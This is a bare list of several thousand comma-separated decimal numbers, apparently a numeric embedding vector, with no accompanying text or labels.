-0.0004633998323697597, -0.02187562733888626, 0.021222179755568504, -0.010885834693908691, -0.025395331904292107, -0.0208954568952322, -0.0028105652891099453, 0.0018303944962099195, -0.02680618315935135, -0.0048006088472902775, 0.0011472452897578478, -0.005940428469330072, -0.006330268923193216, -0.01759851910173893, -0.027311120182275772, 0.0062263114377856255, 0.0021756819915026426, 0.01652924157679081, -0.024088436737656593, -0.029791248962283134, 0.0008989538764581084, -0.013596155680716038, 0.01380407065153122, 0.024236947298049927, 0.014160496182739735, -0.027756651863455772, 0.016811411827802658, -0.00331735797226429, -0.01196253765374422, -0.005532023962587118, -0.02633094973862171, 0.006207747850567102, -0.004808034282177687, -0.035761378705501556, 0.023019159212708473, 0.026939842849969864, -0.013068942353129387, 0.009846259839832783, 0.022128095850348473, -0.004882289562374353, -0.027801204472780228, 0.010024473071098328, -0.024682480841875076, 0.014687709510326385, -0.005554300732910633, -0.020479626953601837, -0.0013978570932522416, -0.004648385103791952, -0.016291625797748566, 0.017553966492414474, -0.009289344772696495, -0.01322487834841013, -0.02518741600215435, -0.023093415424227715, -0.011375920847058296, -0.005747364368289709, 0.011286813765764236, 0.01473968755453825, 0.010514558292925358, 0.013291708193719387, -0.0033062195871025324, -0.032731760293245316, 0.016841115429997444, 0.011613537557423115, -0.018207412213087082, -0.0009625350357964635, 0.008286898024380207, -0.0006868620403110981, 0.011531856842339039, 0.02376171387732029, 0.006267151795327663, 0.010900686495006084, 0.001303181517869234, -0.03484061360359192, -0.01401941105723381, -0.010477430187165737, 0.01679656095802784, -0.001034933957271278, -0.01401941105723381, 0.018445029854774475, 0.013714964501559734, 0.02590026706457138, 0.04012759402394295, -0.031484272330999374, -0.0008850310114212334, -0.018964817747473717, 0.023093415424227715, 0.0022703574504703283, -0.0043773530051112175, -0.007781961001455784, -0.012289261445403099, 0.0127347931265831, 0.006980003323405981, 0.010351196862757206, -0.0001560522650834173, 0.0033155016135424376, -0.0016289768973365426, -0.027132906019687653, 0.024103287607431412, 0.0039021188858896494, 0.01930639147758484, -0.028172481805086136, -0.03403865545988083, 0.012415495701134205, 0.01829651929438114, -0.0029015280306339264, -0.01049970742315054, 0.022024137899279594, 0.014568900689482689, -0.0008024219423532486, -0.03207831457257271, 0.00395038491114974, -0.0408998504281044, 0.019440051168203354, 0.008376004174351692, 0.003185554640367627, 0.03570197522640228, -0.013462495990097523, -0.00260265008546412, 0.019009370356798172, -0.006957726553082466, -0.021504350006580353, 0.03537525236606598, -0.02019745670258999, -0.02492009662091732, -0.01758366823196411, 0.012742218561470509, 0.023093415424227715, -0.01597975194454193, -0.034692101180553436, 0.0396820604801178, 0.024979501962661743, -0.03662274032831192, -0.04330572485923767, -0.027979418635368347, -0.017301497980952263, -0.011665516532957554, 0.03507823124527931, -0.024593373760581017, 0.025929970666766167, 0.008739855140447617, 0.004752342589199543, 0.037008870393037796, -0.008249769918620586, 0.012957559898495674, -0.0009560377220623195, 0.021741967648267746, -0.011056622490286827, -0.013195176608860493, 0.010819004848599434, -0.019365796819329262, -0.0028681131079792976, 0.008769557811319828, -0.053642068058252335, 0.026019075885415077, -0.015653029084205627, 0.02563294768333435, 0.0164401363581419, 0.024519117549061775, 0.016811411827802658, -0.0038538528606295586, -0.0068946098908782005, -0.013662985526025295, 0.010254664346575737, 0.0152669008821249, 0.030741717666387558, 0.013180325739085674, -0.004700364079326391, -0.015682730823755264, 0.035672273486852646, -0.027890311554074287, -0.009861110709607601, -0.00786364171653986, -0.019425200298428535, -0.01866779662668705, -0.0340980589389801, -0.013997134752571583, -0.02144494652748108, -0.0045518530532717705, 0.0014303437201306224, 0.001954772276803851, 0.048622407019138336, 0.009326472878456116, 0.03439508005976677, -0.008101259358227253, 0.004696651361882687, -0.011984813958406448, -0.019039073958992958, 0.030860526487231255, -0.022558776661753654, 0.01758366823196411, -0.004002363421022892, -0.031216951087117195, 0.02062813751399517, -0.0018842295976355672, 0.012148176319897175, -0.011346218176186085, -0.05266189947724342, 0.007499790750443935, -0.005498609039932489, -0.007206482347100973, -0.02385082095861435, 0.019944988191127777, -0.00015303565305657685, -0.02429635263979435, -0.014851070940494537, 0.003655219916254282, -0.008331450633704662, -0.0028514056466519833, 0.011041771620512009, -0.0035178475081920624, -0.0008836387423798442, 0.006950301118195057, -0.006597588304430246, 0.00844283401966095, -0.043988872319459915, 0.010863558389246464, -0.04369185119867325, -0.005071640945971012, -0.003619948634877801, 0.00942300446331501, -0.02347954362630844, -0.03276146203279495, -0.025855714455246925, 0.03062290884554386, 0.04012759402394295, 0.002756729954853654, -0.016054008156061172, -0.034335676580667496, -0.018964817747473717, -0.009348749183118343, -0.01767277531325817, 0.02841009944677353, -0.0026342086493968964, 0.0004937981138937175, 0.003458443097770214, 0.045681893825531006, 0.010863558389246464, -0.008294323459267616, 0.03296937793493271, 0.025172565132379532, 0.017880689352750778, -0.004585267975926399, -0.056285560131073, -0.014011985622346401, -0.006664418149739504, -0.033266399055719376, 0.022113244980573654, 0.006794365122914314, 0.06415662914514542, 0.018237115815281868, -0.006972577888518572, -0.011509579606354237, 0.011762048117816448, 0.00029029202414676547, -0.010521983727812767, -0.019009370356798172, -0.0043179490603506565, -0.018177710473537445, 0.021905329078435898, -0.00549118360504508, -0.024311203509569168, -0.003528985660523176, 0.021415244787931442, 0.029806099832057953, -0.0012976123252883554, -0.01049970742315054, -0.015831241384148598, -0.0002714961301535368, -0.02965758927166462, -0.015608475543558598, 0.028172481805086136, 0.029716992750763893, -0.00473377900198102, 0.0014396257465705276, 0.02759329043328762, 0.0008882796973921359, -0.01599460281431675, -0.025662651285529137, -0.019172731786966324, -0.007729982491582632, -0.0004965827101841569, -0.00754805700853467, -0.012667963281273842, -0.02563294768333435, 0.02662797085940838, -0.01993013732135296, -0.016202518716454506, -0.02019745670258999, 0.03115754760801792, 0.013625857420265675, 0.029256610199809074, -0.004418193828314543, -0.0057028112933039665, 0.018534136936068535, 0.027667544782161713, -0.04636504501104355, -0.01633617840707302, -0.022826096042990685, -0.025855714455246925, -0.00679065240547061, -0.0014229182852432132, 0.03421686589717865, 0.04271167889237404, -0.0022090969141572714, 0.042741380631923676, -0.01670745573937893, -0.025588395074009895, -0.018875710666179657, 0.009564089588820934, -0.009281919337809086, -0.0024114425759762526, 0.028454652056097984, -0.013054091483354568, 0.00018366597942076623, 0.002010463736951351, 0.0035401240456849337, 0.008324025198817253, -0.0048414492048323154, -0.014695134945213795, 0.01957371085882187, 0.013863475061953068, 0.011583835817873478, -0.054622240364551544, 0.020524179562926292, 0.0016410433454439044, -0.0168856680393219, -0.016039157286286354, -0.013521900400519371, -0.02358350157737732, -0.017702477052807808, -0.008264620788395405, 0.01661834865808487, -0.004618682898581028, -0.020152904093265533, 0.009304195642471313, 0.015474815852940083, 0.01460602879524231, -0.0200043935328722, 0.007217620499432087, -0.024058734998106956, 0.0012716229539364576, 0.021133074536919594, 0.012526878155767918, -0.006850056350231171, -0.028365544974803925, -0.020390519872307777, 0.03249414265155792, 0.013336261734366417, 0.0426819771528244, -0.015326305292546749, 0.006088939029723406, -0.006783226504921913, 0.015125815756618977, 0.007080248091369867, 0.042652275413274765, -0.004395917057991028, -0.007135939784348011, 0.028291290625929832, 0.03296937793493271, 0.006920598912984133, 0.0028476929292082787, -0.0006037888815626502, 0.025053756311535835, -0.005958992056548595, -0.005183023866266012, 0.015935199335217476, -0.02010834962129593, -0.01450949627906084, 0.016662901267409325, 0.03870189189910889, 0.008806684985756874, -0.033801037818193436, -0.0029646451584994793, -0.028439801186323166, 0.016989625990390778, 0.01572728343307972, 0.0177767314016819, 0.011984813958406448, -0.016202518716454506, 0.01893511600792408, -0.009846259839832783, 0.036741551011800766, -0.023108266294002533, -0.0009156613377854228, 0.010744749568402767, 0.00001163140495918924, 0.0028235598001629114, 0.0041434490121901035, -0.0023297618608921766, 0.0007536918274126947, -0.02331618219614029, 0.015459964983165264, -0.026598269119858742, -0.021043967455625534, -0.021237032487988472, 0.00679065240547061, 0.007303014397621155, 0.0032950814347714186, 0.013700112700462341, -0.000630242342595011, -0.0007476586033590138, -0.0183856263756752, -0.013380815275013447, 0.043721552938222885, -0.03341491147875786, -0.00023610882635693997, -0.020048946142196655, -0.007566620595753193, -0.01704902946949005, -0.005513459909707308, -0.02839524857699871, -0.008784408681094646, 0.03504852578043938, -0.03956325352191925, 0.004058055114001036, 0.016410432755947113, -0.017880689352750778, 0.019039073958992958, 0.003438022918999195, -0.020212307572364807, -0.03207831457257271, 0.017910391092300415, -0.02303401194512844, -0.02169741503894329, -0.0015974183334037662, 0.024073585867881775, 0.07473058998584747, 0.01749456115067005, -0.019261838868260384, -0.009630919434130192, 0.013120921328663826, -0.0010804154444485903, -0.0009671759908087552, 0.0037498953752219677, 0.004930555354803801, -0.0011231122771278024, 0.02732597105205059, -0.01023238804191351, 0.002197958528995514, -0.0018294663168489933, 0.013700112700462341, 0.011866006068885326, -0.022558776661753654, -0.0075109293684363365, 0.01865294575691223, -0.0013960006181150675, 0.01299468707293272, 0.012059069238603115, 0.017479710280895233, -0.002197958528995514, 0.011227409355342388, -0.0019566286355257034, -0.00897747278213501, -0.0229597557336092, -0.02552899159491062, -0.01750941202044487, 0.004024640191346407, -0.003451017662882805, -0.02376171387732029, -0.016024306416511536, 0.021014265716075897, -0.01848958432674408, 0.028113078325986862, 0.008754706010222435, -0.017123285681009293, -0.014457517303526402, 0.0031168684363365173, 0.01142789889127016, -0.024593373760581017, -0.009853685274720192, 0.020152904093265533, -0.022306308150291443, 0.044612616300582886, 0.004971396178007126, 0.001965910429134965, -0.024504266679286957, -0.007833939976990223, -0.005999832879751921, 0.028365544974803925, 0.02633094973862171, 0.00495654484257102, 0.028618013486266136, -0.013232304714620113, 0.010336345061659813, -0.019098477438092232, -0.011843728832900524, -0.008041854947805405, 0.01759851910173893, -0.008153238333761692, -0.00888094026595354, 0.012140750885009766, -0.014219900593161583, -0.03341491147875786, 0.006675556302070618, 0.00222394778393209, 0.0441373847424984, 0.0013588729780167341, 0.003725762479007244, 0.01829651929438114, -0.0025246820878237486, 0.02116277627646923, 0.016128262504935265, -0.0173311997205019, 0.005123619455844164, -0.04128597676753998, -0.02321222424507141, 0.01811830699443817, 0.026405204087495804, 0.007191631011664867, 0.02760814130306244, -0.030132822692394257, 0.0285883117467165, -0.015430263243615627, -0.007340142037719488, -0.007499790750443935, -0.006241162773221731, -0.008903217501938343, -0.0032932250760495663, 0.00991308968514204, 0.015162943862378597, 0.015563922002911568, 0.039889976382255554, -0.0036737837363034487, -0.019440051168203354, -0.01822226494550705, -0.018905414268374443, 0.012185303494334221, -0.005231289658695459, 0.028796225786209106, -0.0025655224453657866, -0.009660622105002403, 0.020138053223490715, -0.0066495672799646854, 0.016841115429997444, 0.009794281795620918, -0.000609358015935868, -0.03703857213258743, -0.054444026201963425, 0.02036081813275814, -0.03136546164751053, -0.01228183601051569, 0.016202518716454506, 0.010633367113769054, -0.02098456397652626, -0.009066578932106495, -0.018875710666179657, -0.01142789889127016, -0.015786688774824142, 0.02725171484053135, 0.0017533545615151525, -0.00946013256907463, -0.0036849218886345625, -0.004704076796770096, -0.028558610007166862, 0.04063253104686737, 0.03243473917245865, 0.0006501984316855669, 0.013462495990097523, -0.004919417202472687, -0.022647883743047714, 0.01768762618303299, -0.019410349428653717, 0.02653886377811432, 0.010507132858037949, -0.004332799930125475, 0.0059181516990065575, -0.0003543372731655836, 0.033711932599544525, 0.028157630935311317, 0.017167838290333748, 0.02125188335776329, -0.004537002183496952, 0.03596929460763931, 0.01617281697690487, -0.010559111833572388, 0.0198410302400589, 0.008687876164913177, 0.0005230361712165177, 0.011101176030933857, 0.01473226211965084, 0.009237365797162056, 0.0029219482094049454, 0.006352545693516731, -0.022439967840909958, -0.006467641331255436, 0.015356007032096386, 0.0032356770243495703, 0.022736988961696625, 0.014056539162993431, -0.018727200105786324, 0.0037628901191055775, 0.02974669449031353, -0.013187751173973083, -0.026553714647889137, -0.01964796707034111, -0.020940009504556656, 0.008427983149886131, 0.010336345061659813, -0.010254664346575737, 0.0010757744312286377, 0.022573627531528473, 0.016989625990390778, -0.02643490582704544, -0.0003411105426494032, 0.031009037047624588, -0.0189499668776989, -0.013284282758831978, 0.035137634724378586, 0.005710236728191376, 0.001303181517869234, 0.026598269119858742, -0.007729982491582632, 0.019350945949554443, -0.008873514831066132, -0.04054342210292816, 0.017613369971513748, 0.013440219685435295, 0.044434405863285065, -0.023420138284564018, -0.01370753813534975, -0.03258325159549713, -0.023538947105407715, -0.011361069045960903, -0.007752259261906147, -0.013841197825968266, 0.022454818710684776, -0.0034844325855374336, -0.012979836203157902, -0.02849920466542244, -0.0021942458115518093, -0.014709985814988613, -0.04208793491125107, 0.014301581308245659, 0.029434822499752045, -0.02223205380141735, -0.0013811496319249272, -0.0225142240524292, 0.007195343729108572, 0.02285579778254032, -0.005706524010747671, 0.010462579317390919, -0.004351363983005285, 0.008249769918620586, -0.012363516725599766, 0.014346134848892689, 0.02019745670258999, -0.01433128397911787, 0.0319892056286335, -0.0019844742491841316, -0.015029284171760082, -0.008324025198817253, -0.0014674714766442776, 0.0300882700830698, -0.030504100024700165, -0.006850056350231171, 0.0006571598933078349, -0.0018229689449071884, 0.0003134968283120543, 0.007626025006175041, 0.010952664539217949, -0.019707370549440384, 0.0038055868353694677, 0.0063376943580806255, 0.0033340654335916042, 0.001148173469118774, -0.011866006068885326, 0.007057971321046352, 0.005754789803177118, -0.04188001900911331, 0.002114421222358942, -0.019781626760959625, -0.0003016623668372631, -0.009831408970057964, 0.02582601271569729, -0.017093582078814507, 0.028959589079022408, -0.006352545693516731, 0.015846092253923416, -0.01615796610713005, -0.001561218872666359, -0.004236267879605293, 0.046751171350479126, 0.007700280286371708, 0.012177878059446812, 0.00889579113572836, 0.03938503935933113, 0.0013124634278938174, -0.00014746648957952857, 0.010922962799668312, 0.012578857131302357, -0.009111132472753525, 0.030919929966330528, 0.005751077085733414, -0.005524598527699709, 0.004176863934844732, -0.003957810346037149, 0.003972661681473255, 0.008747280575335026, 0.004262257367372513, 0.013239730149507523, -0.016677752137184143, 0.002955363132059574, 0.017390605062246323, -0.009489834308624268, 0.0019492030842229724, 0.000861362146679312, -0.01811830699443817, 0.02099941484630108, -0.011598686687648296, -0.018207412213087082, -0.007158216089010239, -0.018415328115224838, -0.028068523854017258, -0.007425535470247269, -0.005680534522980452, -0.009059153497219086, 0.0016178385121747851, 0.005231289658695459, -0.0075517697259783745, -0.01865294575691223, 0.02848435379564762, -0.009786855429410934, -0.021043967455625534, 0.03365252539515495, -0.00942300446331501, 0.004834023769944906, 0.005635981447994709, 0.02723686397075653, 0.008739855140447617, 0.02447456493973732, 0.002084719017148018, -0.005520885810256004, -0.01661834865808487, -0.0016958066262304783, 0.015563922002911568, -0.015563922002911568, 0.0019027934176847339, -0.006998567376285791, -0.013425367884337902, -0.015430263243615627, 0.010930388234555721, -0.0056099919602274895, -0.005736226215958595, 0.00198818719945848, -0.0010405031498521566, -0.010833856649696827, 0.012370942160487175, -0.0204499252140522, -0.014405539259314537, -0.022662734612822533, -0.014115942642092705, -0.01554907113313675, -0.00337304943241179, -0.0020197457633912563, -0.0021051394287496805, -0.017732178792357445, 0.02071724459528923, 0.027578439563512802, 0.043988872319459915, -0.0026731928810477257, 0.018014349043369293, -0.004648385103791952, 0.0067609502002596855, 0.023331033065915108, -0.01626192219555378, -0.019157880917191505, -0.017895540222525597, 0.029078397899866104, -0.010796728543937206, -0.003243102692067623, 0.00018784284475259483, 0.009578940458595753, 0.0089700473472476, 0.027890311554074287, -0.002450426807627082, -0.025870565325021744, -0.020925158634781837, -0.03225652500987053, 0.005465194117277861, 0.00844283401966095, 0.014613454230129719, -0.0020327402744442225, 0.0002689436078071594, 0.0000985623846645467, 0.006857482250779867, -0.030860526487231255, -0.015653029084205627, 0.014160496182739735, 0.008962620981037617, -0.007299301214516163, 0.0066272905096411705, 0.011576409451663494, -0.01964796707034111, 0.004095182754099369, 0.03490001708269119, -0.009237365797162056, -0.004284534137696028, 0.004700364079326391, -0.015771837905049324, -0.0020772935822606087, -0.010655643418431282, 0.014346134848892689, 0.025439884513616562, -0.017969796434044838, -0.005142183508723974, 0.04686997830867767, -0.00368306552991271, -0.0073549929074943066, -0.017984647303819656, 0.011717494577169418, -0.02609333209693432, 0.010922962799668312, -0.012207580730319023, 0.016499539837241173, 0.009118557907640934, -0.003430597484111786, 0.012571431696414948, 0.010507132858037949, 0.01049970742315054, 0.020672690123319626, 0.03154367581009865, 0.010165558196604252, -0.005119906738400459, 0.012757070362567902, -0.011643239296972752, 0.005799343343824148, 0.020969713106751442, 0.009333898313343525, 0.00127347931265831, 0.01831137016415596, -0.008583919145166874, -0.01473968755453825, -0.0009996626758947968, -0.027563588693737984, 0.02509831078350544, -0.0034491613041609526, 0.004889714997261763, -0.017539115622639656, 0.014836220070719719, -0.007306727115064859, -0.0031892675906419754, -0.009103706106543541, -0.009207664057612419, 0.00019051138951908797, -0.004228842444717884, 0.009111132472753525, 0.0037090550176799297, 0.006434226408600807, -0.015415411442518234, -0.022454818710684776, 0.01831137016415596, -0.013299134559929371, -0.007937896996736526, -0.004258544649928808, 0.00326166651211679, 0.002589655574411154, 0.004169438034296036, 0.03001401387155056, 0.02606363035738468, 0.0003278838121332228, 0.029613034799695015, -0.016113411635160446, -0.009215089492499828, 0.0034770069178193808, 0.006293141283094883, -0.006129779387265444, 0.007655727211385965, 0.007035695016384125, -0.0027474481612443924, 0.000882246415130794, -0.016499539837241173, -0.0004529576690401882, -0.03204861283302307, -0.011620962992310524, -0.00795274879783392, 0.003590246429666877, 0.018638094887137413, 0.0004248798650223762, 0.006638428661972284, 0.009022025391459465, 0.025944821536540985, -0.004113746806979179, 0.008153238333761692, 0.011182856746017933, -0.007752259261906147, -0.0003578180039767176, 0.011821452528238297, -0.004937981255352497, 0.032820865511894226, 0.007871068082749844, -0.0012827612226828933, 0.0030630333349108696, 0.012341240420937538, -0.012356091290712357, -0.012534303590655327, -0.010091302916407585, 0.02368745766580105, -0.0036366560962051153, 0.021504350006580353, -0.009125983342528343, -0.012838751077651978, -0.008494812995195389, -0.0234052874147892, -0.012200155295431614, -0.0013393809786066413, -0.009764579124748707, -0.0013960006181150675, -0.0019510594429448247, -0.01424217689782381, 0.009950217790901661, -0.0039021188858896494, -0.0017394316382706165, -0.0018387482268735766, 0.01303924061357975, 0.019083626568317413, 0.019633116200566292, 0.0016976631013676524, -0.009066578932106495, -0.011873431503772736, 0.013254581019282341, 0.032108016312122345, 0.02475673519074917, -0.007455237675458193, 0.01597975194454193, 0.01767277531325817, -0.005565438885241747, 0.003987512551248074, -0.006475066766142845, 0.0054354919120669365, 0.005235002376139164, 0.012289261445403099, -0.008316599763929844, -0.012519452720880508, -0.0002608219219837338, -0.005075353663414717, -0.0250240545719862, 0.002058729762211442, 0.010529409162700176, 0.003740613581612706, 0.012526878155767918, -0.004366214852780104, -0.002463421318680048, -0.022722138091921806, 0.004514725413173437, -0.00942300446331501, 0.013202602043747902, 0.006504768971353769, 0.01752426289021969, 0.005483758170157671, -0.023821117356419563, -0.002149692503735423, -0.0004188466118648648, -0.007440386805683374, 0.0044701723381876945, -0.0022220914252102375, -0.010922962799668312, 0.009601217694580555, -0.022811245173215866, -0.004106320906430483, -0.017182689160108566, 0.005862460471689701, -0.007878493517637253, 0.01750941202044487, -0.01406396459788084, 0.010314068756997585, -0.02636065147817135, -0.004158299881964922, -0.02215779758989811, 0.002654629060998559, 0.027563588693737984, -0.00009908449283102527, -0.014078815467655659, 0.004206565674394369, -0.026731926947832108, -0.006025821901857853, 0.01822226494550705, -0.016395581886172295, 0.0037721721455454826, -0.01151700597256422, -0.026598269119858742, -0.005881024058908224, 0.02303401194512844, -0.0034695814829319715, 0.0031335758976638317, -0.005632268730551004, 0.018727200105786324, -0.006786939688026905, -0.030712014064192772, 0.02454882115125656, 0.027816055342555046, 0.00839828047901392, 0.02303401194512844, 0.0020550170447677374, 0.011331367306411266, -0.0004299849097151309, -0.021118223667144775, 0.010351196862757206, 0.006463928613811731, -0.018905414268374443, 0.014004560187458992, -0.010744749568402767, 0.004381065722554922, 0.010915537364780903, -0.01152443140745163, 0.005480044987052679, -0.017613369971513748, 0.002450426807627082, 0.019098477438092232, -0.029939759522676468, -0.011383346281945705, -0.0033136452548205853, -0.0177767314016819, 0.00611864123493433, -0.023464692756533623, -0.03724648430943489, 0.0016224795253947377, 0.018697498366236687, 0.02018260583281517, -0.01254915539175272, -0.015200071036815643, -0.0007198128732852638, -0.004392204340547323, -0.019246987998485565, 0.01811830699443817, -0.008858663961291313, 0.005903300829231739, -0.009252217598259449, 0.029004141688346863, -0.02529137395322323, 0.0024392884224653244, -0.021816223859786987, -0.008012153208255768, 0.035226739943027496, 0.002792001236230135, -0.030236780643463135, -0.021222179755568504, 0.006831492763012648, -0.01071504782885313, 0.008212641812860966, -0.004425619263201952, -0.014672857709228992, 0.0009578940807841718, -0.001812758855521679, 0.006972577888518572, 0.002864400390535593, -0.01938064768910408, 0.008376004174351692, 0.01072247326374054, -0.009586365893483162, -0.008828961290419102, -0.000059172234614379704, 0.009319047443568707, 0.009222514927387238, -0.0055505880154669285, 0.0043996297754347324, 0.007310439832508564, 0.012289261445403099, 0.013469921424984932, 0.005832758266478777, 0.01553422026336193, -0.011576409451663494, 0.018994519487023354, -0.011242261156439781, -0.0071507906541228294, 0.007325290702283382, -0.009133408777415752, -0.007440386805683374, -0.013833772391080856, 0.0025506713427603245, 0.011643239296972752, -0.015252050012350082, -0.009801707230508327, 0.01722724176943302, -0.013403091579675674, 0.0033247836399823427, 0.019781626760959625, 0.024533968418836594, 0.0004914776072837412, -0.016143113374710083, 0.020850904285907745, 0.012088771909475327, -0.031484272330999374, -0.018801456317305565, -0.014932751655578613, -0.009356174618005753, 0.002834698185324669, 0.021326137706637383, 0.007729982491582632, -0.011413048021495342, -0.002877394901588559, 0.004154587164521217, -0.002069867914542556, -0.004407055210322142, -0.00011202116729691625, 0.013544176705181599, 0.02419239468872547, -0.01277192123234272, 0.005639694165438414, -0.005465194117277861, -0.005624843295663595, -0.003387900535017252, -0.009556664153933525, -0.00870272796601057, -0.016499539837241173, -0.017108432948589325, 0.0013263862347230315, 0.015415411442518234, 0.005357523914426565, 0.00916311051696539, -0.007236184552311897, 0.007555482443422079, -0.019633116200566292, -0.010076452046632767, -0.0012428490445017815, -0.0024003044236451387, 0.004711502231657505, 0.024444863200187683, -0.009898238815367222, 0.009497259743511677, 0.0024894108064472675, -0.008576493710279465, -0.042028531432151794, -0.011071473360061646, 0.01330655999481678, -0.022826096042990685, 0.005398364271968603, -0.0009068435174413025, -0.0038130125030875206, -0.01249717641621828, 0.01590549759566784, -0.01687081716954708, 0.004295672290027142, -0.021014265716075897, 0.012682815082371235, 0.011940261349081993, -0.004711502231657505, 0.03457329422235489, -0.0012623410439118743, -0.004444182850420475, -0.002511687343940139, -0.011197707615792751, 0.01759851910173893, 0.006066662725061178, -0.00790076982229948, 0.02009349875152111, -0.007496078033000231, -0.021994436159729958, 0.014004560187458992, -0.004930555354803801, -0.021103372797369957, -0.00018447815091349185, -0.02019745670258999, -0.01179175078868866, -0.002238798886537552, -0.02249937318265438, 0.01779158227145672, 0.021504350006580353, -0.0010841281618922949, 0.03267235681414604, 0.003994937986135483, -0.000022146079572848976, 0.0052832686342298985, 0.012333814054727554, -0.03302878141403198, -0.0188311580568552, 0.009757153689861298, 0.033266399055719376, 0.00763345044106245, -0.01706388033926487, -0.008108684793114662, -0.006181758362799883, 0.009809132665395737, -0.012266984209418297, 0.019365796819329262, -0.03213771805167198, 0.020152904093265533, -0.005238715093582869, 0.011153154075145721, -0.011568984016776085, 0.005881024058908224, 0.0019714797381311655, -0.009772004559636116, -0.013722389936447144, -0.012809048406779766, -0.007050545886158943, -0.01938064768910408, 0.013276857323944569, 0.009675472974777222, 0.02725171484053135, 0.022395415231585503, 0.007306727115064859, -0.00021684884268324822, -0.007206482347100973, -0.016187667846679688, -0.019157880917191505, -0.020925158634781837, -0.011078898794949055, 0.015653029084205627, 0.03991967812180519, 0.002493123523890972, 0.0024262936785817146, -0.007588897366076708, 0.005847609136253595, -0.025974523276090622, 0.006330268923193216, -0.003241246333345771, 0.00665327999740839, 0.001659607165493071, 0.006734960712492466, 0.017093582078814507, 0.020836053416132927, -0.011108601465821266, -0.0007202769629657269, 0.008717578835785389, 0.025766607373952866, -0.016395581886172295, 0.0033637676388025284, 0.01559362467378378, -0.023093415424227715, 0.0027196023147553205, -0.0021886765025556087, -0.011123452335596085, -0.010774452239274979, -0.008078983053565025, 0.01450949627906084, -0.013833772391080856, 0.007020843680948019, -0.01695992238819599, 0.001154670724645257, 0.01893511600792408, 0.013960006646811962, 0.01249717641621828, 0.0040506296791136265, 0.021845925599336624, 0.014977305196225643, 0.019885584712028503, -0.024786436930298805, 0.004611257463693619, -0.01991528645157814, 0.012118473649024963, 0.012942708097398281, 0.0012382080312818289, -0.016855966299772263, 0.011361069045960903, 0.02946452423930168, -0.007774535566568375, 0.005532023962587118, 0.006352545693516731, 0.0100021967664361, -0.02285579778254032, 0.008331450633704662, -0.000742553558666259, 0.011680367402732372, -0.011420473456382751, 0.026301246136426926, -0.008635898120701313, -0.004496161825954914, 0.011301664635539055, 0.006809215992689133, 0.004815459717065096, -0.006527045741677284, 0.0031744164880365133, 0.00506792776286602, -0.01597975194454193, -0.015504518523812294, 0.007043120451271534, -0.010625941678881645, 0.010700196959078312, 0.02009349875152111, 0.005041938740760088, -0.005446630530059338, 0.002281495835632086, -0.0031465706415474415, -0.013967432081699371, -0.0008158807177096605, -0.0006269936566241086, -0.009549238719046116, -0.011903133243322372, -0.008383429609239101, -0.0022165223490446806, 0.005027087405323982, 0.011145728640258312, -0.004848874639719725, -0.018459880724549294, 0.0006738673546351492, 0.00431052315980196, 0.0015602906933054328, 0.011405622586607933, 0.009371025487780571, -0.02197958528995514, 0.012578857131302357, -0.002485698089003563, -0.0018842295976355672, -0.009311621077358723, -0.007752259261906147, -0.00739212054759264, -0.004117459524422884, -0.01590549759566784, 0.006486205384135246, 0.014316432178020477, -0.010269515216350555, -0.0028866769280284643, 0.00040306735900230706, -0.014360985718667507, -0.025157714262604713, 0.011814027093350887, 0.010172983631491661, 0.011219983920454979, -0.027845758944749832, -0.010774452239274979, 0.003794448683038354, -0.022380564361810684, 0.014353560283780098, 0.018608391284942627, 0.006809215992689133, -0.010083877481520176, -0.005264704581350088, 0.009044302627444267, -0.012333814054727554, 0.03213771805167198, 0.030504100024700165, 0.006679269019514322, -0.007299301214516163, -0.0017886258428916335, 0.0035178475081920624, 0.004269682802259922, -0.011145728640258312, -0.011888282373547554, -0.0021329850424081087, 0.03778112307190895, -0.00992051512002945, 0.011494728736579418, 0.006211460568010807, -0.014368411153554916, 0.0010683488799259067, 0.020034095272421837, 0.022469669580459595, 0.0052609918639063835, -0.004236267879605293, -0.0005193233955651522, 0.023375585675239563, 0.006512194871902466, -0.013640708290040493, -0.018979668617248535, -0.018014349043369293, 0.005840183701366186, 0.02545473538339138, -0.02187562733888626, 0.000497510889545083, -0.006786939688026905, -0.0009351533954031765, -0.010024473071098328, 0.02187562733888626, -0.022128095850348473, -0.01201451662927866, -0.020613286644220352, -0.009890813380479813, 0.007804237771779299, 0.006233736872673035, 0.02680618315935135, -0.03083082288503647, -0.0016410433454439044, 0.01191798411309719, -0.01724209263920784, -0.011955112218856812, 0.004366214852780104, 0.006883471272885799, 0.0023000596556812525, 0.002437432063743472, 0.000479411130072549, -0.027578439563512802, -0.015118390321731567, -0.003701629349961877, -0.0004355540731921792, 0.024444863200187683, -0.016841115429997444, 0.0157124325633049, 0.001630833256058395, -0.011368494480848312, -0.005933003034442663, -0.014658006839454174, -0.01929154060781002, -0.024608224630355835, 0.0048600127920508385, 0.02698439545929432, -0.003928108140826225, -0.0179400946944952, -0.0276972483843565, -0.006909460760653019, 0.005595141090452671, -0.012408070266246796, -0.001427559182047844, -0.018697498366236687, -0.015489666722714901, -0.00536123663187027, 0.011383346281945705, -0.004314236342906952, -0.022885499522089958, 0.03730589151382446, -0.0006358114769682288, 0.0014154927339404821, 0.022647883743047714, -0.009348749183118343, -0.015875793993473053, 0.02062813751399517, 0.006612439174205065, -0.02520226687192917, -0.005509747192263603, -0.023331033065915108, -0.01868264749646187, -0.00017693659174256027, -0.01759851910173893, -0.018519286066293716, 0.003100160975009203, 0.006794365122914314, -0.01200709119439125, -0.02287064865231514, -0.016633199527859688, 0.009081429801881313, 0.009846259839832783, 0.0319892056286335, -0.017167838290333748, 0.013351112604141235, -0.005539449397474527, 0.007373556960374117, -0.026464609429240227, -0.012578857131302357, -0.014175347052514553, -0.01866779662668705, 0.014479794539511204, -0.0022944905795156956, -0.002702894853428006, -0.006631003227084875, 0.023969627916812897, 0.010462579317390919, -0.008494812995195389, 0.0004088685382157564, 0.01384862419217825, -0.008450259454548359, 0.009215089492499828, 0.006270864512771368, 0.020048946142196655, -0.015445114113390446, -0.005186736583709717, 0.001812758855521679, -0.000051485647418303415, -0.0036180922761559486, 0.0026100757531821728, 0.005635981447994709, -0.009222514927387238, -0.012801622971892357, -0.023910224437713623, -0.0177767314016819, -0.02849920466542244, 0.0012474899413064122, 0.006025821901857853, -0.005832758266478777, 0.011732346378266811, -0.0012632692232728004, -0.002431862987577915, 0.010603664442896843, 0.022974606603384018, -0.002884820569306612, 0.023360734805464745, -0.003577251685783267, -0.007989875972270966, -0.008368578739464283, -0.0014999582199379802, -0.024400310590863228, 0.005454055964946747, 0.012682815082371235, 0.00575850298628211, -0.019974689930677414, -0.020583584904670715, -0.0072621735744178295, 0.0037090550176799297, 